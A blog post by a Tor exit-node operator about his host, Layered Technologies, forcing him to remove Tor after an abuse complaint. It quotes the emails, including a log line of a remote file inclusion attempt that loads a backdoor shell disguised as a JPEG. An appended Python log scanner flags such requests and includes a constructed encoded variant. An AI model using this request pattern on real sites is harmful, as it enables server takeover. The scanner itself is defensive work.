Last Rites

Today has been a long time coming, but the inevitable happened in the end; Layered Technologies shut me down.

It started off with just the usual abuse complaint. This time it seems that someone used Tor to run code stored as a phony JPEG at freeimagehosting.net. The complainant had already fixed their vulnerability by the time they contacted Layered Technologies, but I still got the usual immense email telling me how to fix an exploit I didn’t have. I won’t post it all below as it’s ridiculous. This is the guts:

Ticket #AMU-37245-883

From: abuse@layeredtech.com
To: steve@bananasplit.info

Subject: Policy Enforcement of SID6321 LTSV-1594-SCROOK at 72.21.33.202 for Hacking

Thank you,

Logan
Layered Technologies
Abuse Department
Policy Enforcement Technician

ACCEPTABLE USE POLICY at http://layeredtech.com/aup.shtml

Date: Sun, 15 Oct 2006 18:32:53 -0500

A HACKER from LayeredTech is trying to exploit a hole in our client’s site code that we closed. The HACKING SCRIPTS are provided from FREEIMAGEHOSTING as phony JPGs.

72.21.33.202 - - [15/Oct/2006:03:09:07 -0700] "GET /index.php?pagename=http://img3.freeimagehosting.net/uploads/ba5cd3062d.jpg? HTTP/1.1" 200 18434

HACKER:
Name: drooper.bananasplit.info
Address: 72.21.33.202

HACKING CODE:
Name: img3.freeimagehosting.net
Address: 70.86.147.247

Looks pretty minor to me and I’ve had enough prior dealings with Logan at Layered Technologies to know that he’s one of the good guys. Unfortunately by the time I responded, I didn’t get Logan, I got Terry. Oh dear, this is the guy who claims to know all about Tor but still seems to think I can gaze into a crystal ball and preempt an attack on an insecure website. Things went downhill from here; Terry insisted I shut down my Tor service:

to: steve@bananasplit.info

You must remove the TOR (anonymous proxy) software because it has been used to send a URL embedded with a command to cause a 3rd party server to download a php exploit which is actually r57shell.php (a backdoor shell).

We do not allow TOR or Proxies on our network that are used for abuse.

This is the clincher that convinced me it was time to cancel my contract with Layered Technologies. Terry knows damn well that there’s nothing I can do to stop a Tor exit-node from being used in this manner. It seems Layered Technologies allow people to run Tor servers (sales pitch), but they do not allow Tor functionality. What a rip-off. I replied:

Terry,

I’ll comply and remove Tor, but please take this as notice that I won’t require your hosting beyond the end of this billing period. Having been specifically advised by LayeredTech that I could host a Tor service, this is very disappointing news. It seems your sales pitch is not in tune with your operating practices.

I’d also like to point out that I’ve purchased a number of upgrades to my server. As LayeredTech are changing their policy with regard to Tor, am I entitled to any refund of these costs?

Regards
Steve

I guess the bit about wanting a refund is a little tongue-in-cheek. Layered Technologies will never admit that they erred in allowing a Tor service without really understanding what it was. To claim that the service is acceptable but what it does is not is nothing more than a “We’ve got your money, now fuck off, you’re a nuisance”. Terry’s response was:

We have not changed our policies. You are responsible for all abuse occurring on, from, or through your assigned IP addresses. You are required to remove the cause of any abuse which occurs on, from, or through your assigned IP addresses. We allow proxies and TOR only to the extent that it is not used for abuse. Because TOR is completely anonymous using tunnels to hide communications and preventing traffic analysis to determine the source of an abuse through your server, you cannot identify, remove, or prevent the cause of the abuse. Therefore, the only way to protect our IP space and innocent 3rd party networks from further abuse is to require removal of the TOR. You should understand that your server has been used to attempt to cause the installation of backdoor hacking software onto 3rd party servers which would completely compromise the 3rd party server. This places our company at legal liability and this is justification for the removal of the software.

I wasted my time and replied to this, pointing out to Terry that Layered Technologies are not in any way legally accountable for a service that blindly routes traffic. He already knows this as I’ve bashed my head against a brick wall telling him all that before. I just got an automated response saying the abuse ticket was closed.

So there it is, the end of my Layered Technologies experience. Lots spent in setup and upgrade costs whilst all the time knowing that sooner or later they would pull the plug. At least recording my experiences will make others think twice when opening a service at Layered Technologies that can potentially be abused. In general, such services are probably going to be more trouble to them than the business is worth.
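
The request in the complaint's log excerpt carries a remote URL as the value of the pagename parameter, and that is something the target site can look for in its own access logs. The following is an added example, not part of the original post or of the complaint: the function name is hypothetical, and every sample line except the first (the one quoted in the complaint) is constructed.

```python
import re
from urllib.parse import parse_qsl

# Apache access-log line: client ident user [time] "METHOD target PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
# A parameter value that is itself a remote URL
REMOTE_RE = re.compile(r'^(?:https?|ftp)://(?P<host>[^/?#:]+)', re.IGNORECASE)

def find_remote_includes(lines):
    """Return one finding per query parameter whose decoded value is a remote URL."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the expected format
        _, _, query = m.group("target").partition("?")
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well
        for name, value in parse_qsl(query, keep_blank_values=True):
            hit = REMOTE_RE.match(value.strip())
            if hit:
                findings.append({
                    "client": m.group("client"),
                    "param": name,
                    "remote_host": hit.group("host").lower(),
                    "status": int(m.group("status")),
                })
    return findings

SAMPLE = [
    # the line quoted in the complaint
    '72.21.33.202 - - [15/Oct/2006:03:09:07 -0700] "GET /index.php?pagename=http://img3.freeimagehosting.net/uploads/ba5cd3062d.jpg? HTTP/1.1" 200 18434',
    # constructed lines: a normal page view, an encoded variant, a static file
    '192.0.2.10 - - [15/Oct/2006:03:10:12 -0700] "GET /index.php?pagename=about HTTP/1.1" 200 5120',
    '198.51.100.7 - - [15/Oct/2006:03:11:40 -0700] "GET /index.php?pagename=HTTP%3A%2F%2Fexample.com%2Fx.txt%3F HTTP/1.1" 200 18434',
    '192.0.2.10 - - [15/Oct/2006:03:12:01 -0700] "GET /images/logo.jpg HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for finding in find_remote_includes(SAMPLE):
        print(finding)
```

A 200 status in these findings only says the script returned a page; it does not show whether the remote file was fetched or run. Legitimate redirect or return-URL parameters will match too, so each finding is a lead to review.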
